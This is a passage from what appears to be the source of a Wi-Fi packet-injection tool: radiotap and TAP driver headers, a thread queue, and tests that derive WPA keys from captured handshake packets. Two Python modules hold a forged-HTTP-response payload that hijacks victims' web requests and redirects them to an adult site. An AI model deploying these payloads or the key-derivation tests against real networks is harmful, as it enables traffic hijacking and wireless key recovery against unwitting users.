156 | IEEE80211_RADIOTAP_VHT_KNOWN_SGI_NSYM_DIS = 0x0008, 157 | IEEE80211_RADIOTAP_VHT_KNOWN_LDPC_EXTRA_OFDM_SYM = 0x0010, 158 | IEEE80211_RADIOTAP_VHT_KNOWN_BEAMFORMED = 0x0020, 159 | IEEE80211_RADIOTAP_VHT_KNOWN_BANDWIDTH = 0x0040, 160 | IEEE80211_RADIOTAP_VHT_KNOWN_GROUP_ID = 0x0080, 161 | IEEE80211_RADIOTAP_VHT_KNOWN_PARTIAL_AID = 0x0100, 162 | }; 163 | 164 | enum ieee80211_radiotap_vht_flags { 165 | IEEE80211_RADIOTAP_VHT_FLAG_STBC = 0x01, 166 | IEEE80211_RADIOTAP_VHT_FLAG_TXOP_PS_NA = 0x02, 167 | IEEE80211_RADIOTAP_VHT_FLAG_SGI = 0x04, 168 | IEEE80211_RADIOTAP_VHT_FLAG_SGI_NSYM_M10_9 = 0x08, 169 | IEEE80211_RADIOTAP_VHT_FLAG_LDPC_EXTRA_OFDM_SYM = 0x10, 170 | IEEE80211_RADIOTAP_VHT_FLAG_BEAMFORMED = 0x20, 171 | }; 172 | 173 | enum ieee80211_radiotap_vht_coding { 174 | IEEE80211_RADIOTAP_CODING_LDPC_USER0 = 0x01, 175 | IEEE80211_RADIOTAP_CODING_LDPC_USER1 = 0x02, 176 | IEEE80211_RADIOTAP_CODING_LDPC_USER2 = 0x04, 177 | IEEE80211_RADIOTAP_CODING_LDPC_USER3 = 0x08, 178 | }; 179 | 180 | /* for IEEE80211_RADIOTAP_TIMESTAMP */ 181 | enum ieee80211_radiotap_timestamp_unit_spos { 182 | IEEE80211_RADIOTAP_TIMESTAMP_UNIT_MASK = 0x000F, 183 | IEEE80211_RADIOTAP_TIMESTAMP_UNIT_MS = 0x0000, 184 | IEEE80211_RADIOTAP_TIMESTAMP_UNIT_US = 0x0001, 185 | IEEE80211_RADIOTAP_TIMESTAMP_UNIT_NS = 0x0003, 186 | IEEE80211_RADIOTAP_TIMESTAMP_SPOS_MASK = 0x00F0, 187 | IEEE80211_RADIOTAP_TIMESTAMP_SPOS_BEGIN_MDPU = 0x0000, 188 | IEEE80211_RADIOTAP_TIMESTAMP_SPOS_PLCP_SIG_ACQ = 0x0010, 189 | IEEE80211_RADIOTAP_TIMESTAMP_SPOS_EO_PPDU = 0x0020, 190 | IEEE80211_RADIOTAP_TIMESTAMP_SPOS_EO_MPDU = 0x0030, 191 | IEEE80211_RADIOTAP_TIMESTAMP_SPOS_UNKNOWN = 0x00F0, 192 | }; 193 | 194 | enum ieee80211_radiotap_timestamp_flags { 195 | IEEE80211_RADIOTAP_TIMESTAMP_FLAG_64BIT = 0x00, 196 | IEEE80211_RADIOTAP_TIMESTAMP_FLAG_32BIT = 0x01, 197 | IEEE80211_RADIOTAP_TIMESTAMP_FLAG_ACCURACY = 0x02, 198 | }; 199 | 200 | #endif /* __RADIOTAP_H */ 201 | -------------------------------------------------------------------------------- /osdep/radiotap/radiotap_iter.h: -------------------------------------------------------------------------------- 1 | #ifndef __RADIOTAP_ITER_H 2 | #define __RADIOTAP_ITER_H 3 | 4 | #include 5 | #include "radiotap.h" 6 | 7 | /* Radiotap header iteration 8 | * implemented in radiotap.c 9 | */ 10 | 11 | struct radiotap_override { 12 | uint8_t field; 13 | uint8_t align:4, size:4; 14 | }; 15 | 16 | struct radiotap_align_size { 17 | uint8_t align:4, size:4; 18 | }; 19 | 20 | struct ieee80211_radiotap_namespace { 21 | const struct radiotap_align_size *align_size; 22 | int n_bits; 23 | uint32_t oui; 24 | uint8_t subns; 25 | }; 26 | 27 | struct ieee80211_radiotap_vendor_namespaces { 28 | const struct ieee80211_radiotap_namespace *ns; 29 | int n_ns; 30 | }; 31 | 32 | /** 33 | * struct ieee80211_radiotap_iterator - tracks walk thru present radiotap args 34 | * @this_arg_index: index of current arg, valid after each successful call 35 | * to ieee80211_radiotap_iterator_next() 36 | * @this_arg: pointer to current radiotap arg; it is valid after each 37 | * call to ieee80211_radiotap_iterator_next() but also after 38 | * ieee80211_radiotap_iterator_init() where it will point to 39 | * the beginning of the actual data portion 40 | * @this_arg_size: length of the current arg, for convenience 41 | * @current_namespace: pointer to the current namespace definition 42 | * (or internally %NULL if the current namespace is unknown) 43 | * @is_radiotap_ns: indicates whether the current namespace is the default 44 | * radiotap namespace or not 45 | * 46 | * @overrides: override standard radiotap fields 47 | * @n_overrides: number of overrides 48 | * 49 | * @_rtheader: pointer to the radiotap header we are walking through 50 | * @_max_length: length of radiotap header in cpu byte ordering 51 | * @_arg_index: next argument index 52 | * @_arg: next argument pointer 53 | * @_next_bitmap: internal pointer to next present u32 54 | * @_bitmap_shifter: internal shifter for curr u32 bitmap, b0 set == arg present 55 | * @_vns: vendor namespace definitions 56 | * @_next_ns_data: beginning of the next namespace's data 57 | * @_reset_on_ext: internal; reset the arg index to 0 when going to the 58 | * next bitmap word 59 | * 60 | * Describes the radiotap parser state. Fields prefixed with an underscore 61 | * must not be used by users of the parser, only by the parser internally. 62 | */ 63 | 64 | struct ieee80211_radiotap_iterator { 65 | struct ieee80211_radiotap_header *_rtheader; 66 | const struct ieee80211_radiotap_vendor_namespaces *_vns; 67 | const struct ieee80211_radiotap_namespace *current_namespace; 68 | 69 | unsigned char *_arg, *_next_ns_data; 70 | uint32_t *_next_bitmap; 71 | 72 | unsigned char *this_arg; 73 | const struct radiotap_override *overrides; /* Only for RADIOTAP_SUPPORT_OVERRIDES */ 74 | int n_overrides; /* Only for RADIOTAP_SUPPORT_OVERRIDES */ 75 | int this_arg_index; 76 | int this_arg_size; 77 | 78 | int is_radiotap_ns; 79 | 80 | int _max_length; 81 | int _arg_index; 82 | uint32_t _bitmap_shifter; 83 | int _reset_on_ext; 84 | }; 85 | 86 | extern int ieee80211_radiotap_iterator_init( 87 | struct ieee80211_radiotap_iterator *iterator, 88 | struct ieee80211_radiotap_header *radiotap_header, 89 | int max_length, const struct ieee80211_radiotap_vendor_namespaces *vns); 90 | 91 | extern int ieee80211_radiotap_iterator_next( 92 | struct ieee80211_radiotap_iterator *iterator); 93 | 94 | #endif /* __RADIOTAP_ITER_H */ 95 | -------------------------------------------------------------------------------- /osdep/tap-win32/common.h: -------------------------------------------------------------------------------- 1 | /* 2 | * TAP-Win32 -- A kernel driver to provide virtual tap device functionality 3 | * on Windows. Originally derived from the CIPE-Win32 4 | * project by Damion K. Wilson, with extensive modifications by 5 | * James Yonan. 6 | * 7 | * All source code which derives from the CIPE-Win32 project is 8 | * Copyright (C) Damion K. Wilson, 2003, and is released under the 9 | * GPL version 2 (see below). 10 | * 11 | * All other source code is Copyright (C) 2002-2005 OpenVPN Solutions LLC, 12 | * and is released under the GPL version 2 (see below). 13 | * 14 | * This program is free software; you can redistribute it and/or modify 15 | * it under the terms of the GNU General Public License version 2 16 | * as published by the Free Software Foundation. 17 | * 18 | * This program is distributed in the hope that it will be useful, 19 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 20 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 21 | * GNU General Public License for more details. 22 | * 23 | * You should have received a copy of the GNU General Public License 24 | * along with this program (see the file COPYING included with this 25 | * distribution); if not, write to the Free Software Foundation, Inc., 26 | * 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA 27 | */ 28 | 29 | //=============================================== 30 | // This file is included both by OpenVPN and 31 | // the TAP-Win32 driver and contains definitions 32 | // common to both. 33 | //=============================================== 34 | 35 | //============= 36 | // TAP IOCTLs 37 | //============= 38 | 39 | #define TAP_CONTROL_CODE(request,method) \ 40 | CTL_CODE (FILE_DEVICE_UNKNOWN, request, method, FILE_ANY_ACCESS) 41 | 42 | // Present in 8.1 43 | 44 | #define TAP_IOCTL_GET_MAC TAP_CONTROL_CODE (1, METHOD_BUFFERED) 45 | #define TAP_IOCTL_GET_VERSION TAP_CONTROL_CODE (2, METHOD_BUFFERED) 46 | #define TAP_IOCTL_GET_MTU TAP_CONTROL_CODE (3, METHOD_BUFFERED) 47 | #define TAP_IOCTL_GET_INFO TAP_CONTROL_CODE (4, METHOD_BUFFERED) 48 | #define TAP_IOCTL_CONFIG_POINT_TO_POINT TAP_CONTROL_CODE (5, METHOD_BUFFERED) 49 | #define TAP_IOCTL_SET_MEDIA_STATUS TAP_CONTROL_CODE (6, METHOD_BUFFERED) 50 | #define TAP_IOCTL_CONFIG_DHCP_MASQ TAP_CONTROL_CODE (7, METHOD_BUFFERED) 51 | #define TAP_IOCTL_GET_LOG_LINE TAP_CONTROL_CODE (8, METHOD_BUFFERED) 52 | #define TAP_IOCTL_CONFIG_DHCP_SET_OPT TAP_CONTROL_CODE (9, METHOD_BUFFERED) 53 | 54 | // Added in 8.2 55 | 56 | /* obsoletes TAP_IOCTL_CONFIG_POINT_TO_POINT */ 57 | #define TAP_IOCTL_CONFIG_TUN TAP_CONTROL_CODE (10, METHOD_BUFFERED) 58 | 59 | //================= 60 | // Registry keys 61 | //================= 62 | 63 | #define ADAPTER_KEY "SYSTEM\\CurrentControlSet\\Control\\Class\\{4D36E972-E325-11CE-BFC1-08002BE10318}" 64 | 65 | #define NETWORK_CONNECTIONS_KEY "SYSTEM\\CurrentControlSet\\Control\\Network\\{4D36E972-E325-11CE-BFC1-08002BE10318}" 66 | 67 | //====================== 68 | // Filesystem prefixes 69 | //====================== 70 | 71 | #define USERMODEDEVICEDIR "\\\\.\\Global\\" 72 | #define SYSDEVICEDIR "\\Device\\" 73 | #define USERDEVICEDIR "\\DosDevices\\Global\\" 74 | #define TAPSUFFIX ".tap" 75 | 76 | //========================================================= 77 | // TAP_COMPONENT_ID -- This string defines the TAP driver 78 | // type -- different component IDs can reside in the system 79 | // simultaneously. 80 | //========================================================= 81 | 82 | #define TAP_COMPONENT_ID "tap0801" 83 | -------------------------------------------------------------------------------- /python/http_pornhub.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # 3 | # Demo python module to illustrate python integration. 4 | # the TCP data payload is sent as input to forge_response, and the data 5 | # returned from the function is injected as a response. If you don't 6 | # want to send a response return None 7 | 8 | import re 9 | 10 | header_template = """HTTP/1.1 302 Redirect 11 | Location: http://pornhub.com/ 12 | Connection: close 13 | Content-type: text/html 14 | Content-length: %(contentlen)s 15 | 16 | """ 17 | 18 | content_template = """ 19 | Hijacked %(hostname)s.. 20 | 21 |
22 | You have been hijacked ;-) 23 |
24 | 25 | """ 26 | 27 | pattern = re.compile("host: ([^\r\n]*)", re.IGNORECASE) 28 | 29 | def forge_response(data, length): 30 | 31 | x = pattern.search(data) 32 | hostname = x.group(1) 33 | if not hostname: 34 | return None 35 | 36 | print ">> hostname: %s" % (hostname) 37 | 38 | content = content_template % vars() 39 | contentlen = len(content) 40 | 41 | header = header_template % vars() 42 | 43 | return header + content 44 | 45 | -------------------------------------------------------------------------------- /python/pyexample.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # 3 | # Demo python module to illustrate python integration. 4 | # the TCP data payload is sent as input to forge_response, and the data 5 | # returned from the function is injected as a response. If you don't 6 | # want to send a response return None 7 | 8 | import re 9 | 10 | header_template = """HTTP/1.1 302 Redirect 11 | Location: http://pornhub.com/ 12 | Connection: close 13 | Content-type: text/html 14 | Content-length: %(contentlen)s 15 | 16 | """ 17 | 18 | content_template = """ 19 | Hijacked %(hostname)s.. 20 | 21 |
22 | You have been hijacked ;-) 23 |
24 | 25 | """ 26 | 27 | pattern = re.compile("host: ([^\r\n]*)", re.IGNORECASE) 28 | 29 | def forge_response(data, length): 30 | 31 | x = pattern.search(data) 32 | hostname = x.group(1) 33 | if not hostname: 34 | return None 35 | 36 | print ">> hostname: %s" % (hostname) 37 | 38 | content = content_template % vars() 39 | contentlen = len(content) 40 | 41 | header = header_template % vars() 42 | 43 | return header + content 44 | 45 | -------------------------------------------------------------------------------- /test/test_eapol.c: -------------------------------------------------------------------------------- 1 | /* 2 | * 3 | * test-calc-ptk.c 4 | * 5 | * Copyright (C) 2012 Carlos Alberto Lopez Perez 6 | * 7 | * 8 | * This program is free software; you can redistribute it and/or modify 9 | * it under the terms of the GNU General Public License as published by 10 | * the Free Software Foundation; either version 2 of the License, or 11 | * (at your option) any later version. 12 | * 13 | * This program is distributed in the hope that it will be useful, 14 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 15 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 16 | * GNU General Public License for more details. 17 | * 18 | * You should have received a copy of the GNU General Public License 19 | * along with this program; if not, write to the Free Software 20 | * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, 21 | * MA 02110-1301, USA. 22 | * 23 | */ 24 | 25 | 26 | #include 27 | #include 28 | #include 29 | #include 30 | #include "../crypto.h" 31 | #include "../ap.h" 32 | 33 | void hexdump (void *addr, u_int len) { 34 | u_int i; 35 | u_char buff[17]; 36 | u_char *pc = addr; 37 | 38 | // Process every byte in the data. 39 | for (i = 0; i < len; i++) { 40 | // Multiple of 16 means new line (with line offset). 41 | 42 | if ((i % 16) == 0) { 43 | // Just don't print ASCII for the zeroth line. 44 | if (i != 0) { 45 | printf(" %s\n", buff); 46 | } 47 | // Output the offset. 48 | printf(" %04x ", i); 49 | } 50 | 51 | // Now the hex code for the specific character. 52 | printf (" %02x", pc[i]); 53 | // And store a printable ASCII character for later. 54 | if ((pc[i] < 0x20) || (pc[i] > 0x7e)) { 55 | buff[i % 16] = '.'; 56 | } else { 57 | buff[i % 16] = pc[i]; 58 | } 59 | buff[(i % 16) + 1] = '\0'; 60 | } 61 | 62 | // Pad out last line if not exactly 16 characters. 63 | while ((i % 16) != 0) { 64 | printf (" "); 65 | i++; 66 | } 67 | // And print the final ASCII bit. 68 | printf (" %s\n", buff); 69 | } 70 | 71 | void print_sta(struct sta_info *sta) { 72 | printf("stmac------------\n"); 73 | hexdump(sta->wpa.stmac, 6); 74 | printf("anonce------------\n"); 75 | hexdump(sta->wpa.anonce, 32); 76 | printf("eapol------------\n"); 77 | hexdump(sta->wpa.eapol, 256); 78 | printf("keymic------------\n"); 79 | hexdump(sta->wpa.keymic, 16); 80 | printf("snonce------------\n"); 81 | hexdump(sta->wpa.snonce, 32); 82 | printf("eapol_size------------\n"); 83 | printf("%d\n", sta->wpa.eapol_size); 84 | printf("------------\n"); 85 | } 86 | 87 | int main(int argc, char **argv) 88 | { 89 | if (argc < 1) return 1; 90 | 91 | 92 | static unsigned char pkt1[99] = "\x01\x03\x00\x5f\x02\x00\x8a\x00\x10\x00\x00\x00\x00\x00\x00\x00\x01\x22\x58\x54\xb0\x44\x4d\xe3\xaf\x06\xd1\x49\x2b\x85\x29\x84\xf0\x4c\xf6\x27\x4c\x0e\x32\x18\xb8\x68\x17\x56\x86\x4d\xb7\xa0\x55\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; 93 | static unsigned char pkt2[121] = "\x01\x03\x00\x75\x02\x01\x0a\x00\x10\x00\x00\x00\x00\x00\x00\x00\x01\x59\x16\x8b\xc3\xa5\xdf\x18\xd7\x1e\xfb\x64\x23\xf3\x40\x08\x8d\xab\x9e\x1b\xa2\xbb\xc5\x86\x59\xe0\x7b\x37\x64\xb0\xde\x85\x70\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd5\x35\x53\x82\xb8\xa9\xb8\x06\xdc\xaf\x99\xcd\xaf\x56\x4e\xb6\x00\x16\x30\x14\x01\x00\x00\x0f\xac\x04\x01\x00\x00\x0f\xac\x04\x01\x00\x00\x0f\xac\x02\x01\x00"; 94 | static unsigned char pkt3[155] = "\x01\x03\x00\x97\x02\x13\xca\x00\x10\x00\x00\x00\x00\x00\x00\x00\x02\x22\x58\x54\xb0\x44\x4d\xe3\xaf\x06\xd1\x49\x2b\x85\x29\x84\xf0\x4c\xf6\x27\x4c\x0e\x32\x18\xb8\x68\x17\x56\x86\x4d\xb7\xa0\x55\x19\x2e\xee\xf7\xfd\x96\x8e\xc8\x0a\xee\x3d\xfb\x87\x5e\x82\x22\x37\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1e\x22\x86\x72\xd2\xde\xe9\x30\x71\x4f\x68\x8c\x57\x46\x02\x8d\x00\x38\x3c\xa9\x18\x54\x62\xec\xa4\xab\x7f\xf5\x1c\xd3\xa3\xe6\x17\x9a\x83\x91\xf5\xad\x82\x4c\x9e\x09\x76\x37\x94\xc6\x80\x90\x2a\xd3\xbf\x07\x03\x45\x2f\xbb\x7c\x1f\x5f\x1e\xe9\xf5\xbb\xd3\x88\xae\x55\x9e\x78\xd2\x7e\x6b\x12\x1f"; 95 | static unsigned char pkt4[99] = "\x01\x03\x00\x5f\x02\x03\x0a\x00\x10\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x9d\xc8\x1c\xa6\xc4\xc7\x29\x64\x8d\xe7\xf0\x0b\x43\x63\x35\xc8\x00\x00"; 96 | 97 | static unsigned char ostmac[6] = "\x00\x13\x46\xfe\x32\x0c"; 98 | static unsigned char obssid[6] = "\x00\x14\x6c\x7e\x40\x80"; 99 | static char essid[9] = "Harkonen\x00"; 100 | static char key[8] = "\x31\x32\x33\x34\x35\x36\x37\x38"; 101 | 102 | unsigned char pmk[40]; 103 | unsigned char ptk[80]; 104 | 105 | struct sta_info *sta; 106 | sta = (struct sta_info *) malloc(sizeof(struct sta_info)); 107 | struct ap_info *ap; 108 | ap = (struct ap_info *) malloc(sizeof(struct ap_info)); 109 | 110 | bzero(sta,sizeof(struct sta_info)); 111 | bzero(ap,sizeof(struct ap_info)); 112 | 113 | sta->ap = ap; 114 | 115 | printf("essid: %s\n", essid); 116 | calc_pmk(key, essid, pmk); 117 | hexdump(pmk, 40); 118 | 119 | memcpy(sta->wpa.stmac, ostmac, 6); 120 | memcpy(sta->ap->bssid, obssid, 6); 121 | eapol_wpa_process(pkt1, 99, sta); 122 | print_sta(sta); 123 | eapol_wpa_process(pkt2, 121, sta); 124 | print_sta(sta); 125 | eapol_wpa_process(pkt3, 155, sta); 126 | print_sta(sta); 127 | eapol_wpa_process(pkt4, 99, sta); 128 | print_sta(sta); 129 | 130 | // unsigned char pmk[32]; // ??????????????? 131 | 132 | if(calc_ptk(sta, pmk)) { 133 | printf("OK\n"); 134 | } else { 135 | printf("FALSE\n"); 136 | } 137 | 138 | 139 | 140 | } 141 | 142 | -------------------------------------------------------------------------------- /test/test_pmk.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include "crypto.h" 5 | 6 | #define PLEN 40 7 | #define KLEN 14 8 | 9 | void hexdump (void *addr, u_int len) { 10 | u_int i; 11 | u_char buff[17]; 12 | u_char *pc = addr; 13 | 14 | // Process every byte in the data. 15 | for (i = 0; i < len; i++) { 16 | // Multiple of 16 means new line (with line offset). 17 | 18 | if ((i % 16) == 0) { 19 | // Just don't print ASCII for the zeroth line. 20 | if (i != 0) { 21 | printf(" %s\n", buff); 22 | } 23 | // Output the offset. 24 | printf(" %04x ", i); 25 | } 26 | 27 | // Now the hex code for the specific character. 28 | printf (" %02x", pc[i]); 29 | // And store a printable ASCII character for later. 30 | if ((pc[i] < 0x20) || (pc[i] > 0x7e)) { 31 | buff[i % 16] = '.'; 32 | } else { 33 | buff[i % 16] = pc[i]; 34 | } 35 | buff[(i % 16) + 1] = '\0'; 36 | } 37 | 38 | // Pad out last line if not exactly 16 characters. 39 | while ((i % 16) != 0) { 40 | printf (" "); 41 | i++; 42 | } 43 | // And print the final ASCII bit. 44 | printf (" %s\n", buff); 45 | } 46 | 47 | 48 | 49 | int main(int argc, char **argv) 50 | { 51 | if (argc < 1) return 1; 52 | 53 | static unsigned char expected[PLEN] = 54 | "\x1d\x4d\xf5\x5d\xd8\xd9\x13\xf5\x54\x0d\x05\x3c\xdb\x57\x83\x53" 55 | "\xd0\x6c\x0f\xb3\x50\x71\x10\xee\x48\xda\xce\x2b\x60\xf6\xd0\xd4" 56 | "\xc2\x24\x39\x9f\xe8\x1d\x1e\x80"; 57 | static char key[KLEN] = 58 | "\x6E\x9C\x7A\x91\x9F\xB8\xAE\x93\xC1\xAB\x80\x3C\x09\x00"; 59 | static char essid[8] = "T3st1ng"; 60 | 61 | 62 | unsigned char pmk[PLEN]; 63 | 64 | printf("Calc try\n"); 65 | calc_pmk( key, essid, pmk ); 66 | hexdump(pmk, PLEN); 67 | printf("-----------------\n"); 68 | 69 | printf("Expected\n"); 70 | hexdump(expected, PLEN); 71 | printf("-----------------\n"); 72 | 73 | 74 | } 75 | 76 | -------------------------------------------------------------------------------- /test/test_ptk.c: -------------------------------------------------------------------------------- 1 | /* 2 | * 3 | * test-calc-ptk.c 4 | * 5 | * Copyright (C) 2012 Carlos Alberto Lopez Perez 6 | * 7 | * 8 | * This program is free software; you can redistribute it and/or modify 9 | * it under the terms of the GNU General Public License as published by 10 | * the Free Software Foundation; either version 2 of the License, or 11 | * (at your option) any later version. 12 | * 13 | * This program is distributed in the hope that it will be useful, 14 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 15 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 16 | * GNU General Public License for more details. 17 | * 18 | * You should have received a copy of the GNU General Public License 19 | * along with this program; if not, write to the Free Software 20 | * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, 21 | * MA 02110-1301, USA. 22 | * 23 | */ 24 | 25 | 26 | #include 27 | #include 28 | #include 29 | #include 30 | #include "crypto.h" 31 | #include "ap.h" 32 | 33 | int main(int argc, char **argv) 34 | { 35 | if (argc < 1) return 1; 36 | 37 | static unsigned char opmk[32] = "\xee\x51\x88\x37\x93\xa6\xf6\x8e\x96\x15\xfe\x73\xc8\x0a\x3a\xa6" 38 | "\xf2\xdd\x0e\xa5\x37\xbc\xe6\x27\xb9\x29\x18\x3c\xc6\xe5\x79\x25"; 39 | 40 | static unsigned char ostmac[6] = "\x00\x13\x46\xfe\x32\x0c"; 41 | static unsigned char obssid[6] = "\x00\x14\x6c\x7e\x40\x80"; 42 | static unsigned char osnonce[32] = "\x59\x16\x8b\xc3\xa5\xdf\x18\xd7\x1e\xfb\x64\x23\xf3\x40\x08\x8d" 43 | "\xab\x9e\x1b\xa2\xbb\xc5\x86\x59\xe0\x7b\x37\x64\xb0\xde\x85\x70"; 44 | static unsigned char oanonce[32] = "\x22\x58\x54\xb0\x44\x4d\xe3\xaf\x06\xd1\x49\x2b\x85\x29\x84\xf0" 45 | "\x4c\xf6\x27\x4c\x0e\x32\x18\xb8\x68\x17\x56\x86\x4d\xb7\xa0\x55"; 46 | static unsigned char okeymic[16] = "\xd5\x35\x53\x82\xb8\xa9\xb8\x06\xdc\xaf\x99\xcd\xaf\x56\x4e\xb6"; 47 | 48 | static unsigned char optk[80] = "\x0d\xde\xae\x80\x83\xf9\x2c\xa9\xaf\xdb\x25\x0d\xde\xe5\x25\x1b" 49 | "\xc0\xee\xb4\x7e\xf2\x2a\xf7\x9e\x25\x34\x6e\x8b\x73\xe2\xca\x7d" 50 | "\x94\xb0\x60\x5f\x2e\xed\x66\xd8\x60\x76\xb3\x38\xa6\x65\xfe\xe3" 51 | "\x9f\xde\x22\x1e\xb1\x38\x6b\x3d\xa7\xac\x6a\xbe\x7e\xe0\x00\x1f" 52 | "\xbd\x92\xab\xec\xc8\xba\x49\xf0\x5d\xff\x8f\x50\x1e\xfa\xaa\xcc"; 53 | 54 | static unsigned char eptk[80] = "\xea\x0e\x40\x46\x33\xc8\x02\x45\x03\x02\x86\x8c\xca\xa7\x49\xde" 55 | "\x5c\xba\x5a\xbc\xb2\x67\xe2\xde\x1d\x5e\x21\xe5\x7a\xcc\xd5\x07" 56 | "\x9b\x31\xe9\xff\x22\x0e\x13\x2a\xe4\xf6\xed\x9e\xf1\xac\xc8\x85" 57 | "\x45\x82\x5f\xc3\x2e\xe5\x59\x61\x39\x5a\xe4\x37\x34\xd6\xc1\x07" 58 | "\x98\xef\x5a\xfe\x42\xc0\x74\x26\x47\x18\x68\xa5\x77\xd4\xd1\x7e"; 59 | 60 | static unsigned char oeapol[256]= "\x01\x03\x00\x75\x02\x01\x0a\x00\x10\x00\x00\x00\x00\x00\x00\x00" 61 | "\x01\x59\x16\x8b\xc3\xa5\xdf\x18\xd7\x1e\xfb\x64\x23\xf3\x40\x08" 62 | "\x8d\xab\x9e\x1b\xa2\xbb\xc5\x86\x59\xe0\x7b\x37\x64\xb0\xde\x85" 63 | "\x70\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 64 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 65 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 66 | "\x00\x00\x16\x30\x14\x01\x00\x00\x0f\xac\x04\x01\x00\x00\x0f\xac" 67 | "\x04\x01\x00\x00\x0f\xac\x02\x01\x00\x00\x00\x00\x00\x00\x00\x00" 68 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 69 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 70 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 71 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 72 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 73 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 74 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 75 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; 76 | 77 | 78 | 79 | unsigned char pmk[40]; 80 | unsigned char ptk[80]; 81 | 82 | memcpy(&pmk, &opmk, 32); 83 | 84 | struct sta_info *sta; 85 | struct ap_info *ap; 86 | sta = (struct sta_info *) malloc(sizeof(struct sta_info)); 87 | ap = (struct ap_info *) malloc(sizeof(struct ap_info)); 88 | bzero(sta,sizeof(struct sta_info)); 89 | bzero(ap,sizeof(struct ap_info)); 90 | 91 | sta->ap = ap; 92 | 93 | memcpy(sta->wpa.stmac,&ostmac,6); 94 | memcpy(sta->ap->bssid,&obssid,6); 95 | memcpy(sta->wpa.ptk,&optk,80); 96 | memcpy(sta->wpa.anonce,&oanonce,32); 97 | sta->wpa.eapol_size=121; 98 | memcpy(sta->wpa.eapol,&oeapol,256); 99 | memcpy(sta->wpa.keymic,&okeymic,16); 100 | memcpy(sta->wpa.snonce,&osnonce,32); 101 | 102 | if(calc_ptk(sta, pmk)) { 103 | printf("OK\n"); 104 | } else { 105 | printf("FALSE\n"); 106 | } 107 | } 108 | 109 | -------------------------------------------------------------------------------- /test/wpa2.eapol.cap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0x0d/lrc/009e4d86440ba9580ab2f7d7d006e8748c4018b7/test/wpa2.eapol.cap -------------------------------------------------------------------------------- /tqueue.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include "tqueue.h" 8 | 9 | #define MSGPOOL_SIZE 256 10 | 11 | struct msglist { 12 | struct threadmsg msg; 13 | struct msglist *next; 14 | }; 15 | 16 | static inline struct msglist *get_msglist(struct threadqueue *queue) 17 | { 18 | struct msglist *tmp; 19 | 20 | if(queue->msgpool != NULL) { 21 | tmp = queue->msgpool; 22 | queue->msgpool = tmp->next; 23 | queue->msgpool_length--; 24 | } else { 25 | tmp = malloc(sizeof *tmp); 26 | } 27 | 28 | return tmp; 29 | } 30 | 31 | static inline void release_msglist(struct threadqueue *queue,struct msglist *node) 32 | { 33 | 34 | if(queue->msgpool_length > ( queue->length/8 + MSGPOOL_SIZE)) { 35 | free(node); 36 | } else { 37 | node->msg.data = NULL; 38 | node->msg.msgtype = 0; 39 | node->next = queue->msgpool; 40 | queue->msgpool = node; 41 | queue->msgpool_length++; 42 | } 43 | if(queue->msgpool_length > (queue->length/4 + MSGPOOL_SIZE*10)) { 44 | struct msglist *tmp = queue->msgpool; 45 | queue->msgpool = tmp->next; 46 | free(tmp); 47 | queue->msgpool_length--; 48 | } 49 | } 50 | 51 | int thread_queue_init(struct threadqueue *queue) 52 | { 53 | int ret = 0; 54 | if (queue == NULL) { 55 | return EINVAL; 56 | } 57 | memset(queue, 0, sizeof(struct threadqueue)); 58 | ret = pthread_cond_init(&queue->cond, NULL); 59 | if (ret != 0) { 60 | return ret; 61 | } 62 | 63 | ret = pthread_mutex_init(&queue->mutex, NULL); 64 | if (ret != 0) { 65 | pthread_cond_destroy(&queue->cond); 66 | return ret; 67 | } 68 | 69 | return 0; 70 | 71 | } 72 | 73 | int thread_queue_add(struct threadqueue *queue, void *data, long msgtype) 74 | { 75 | struct msglist *newmsg; 76 | 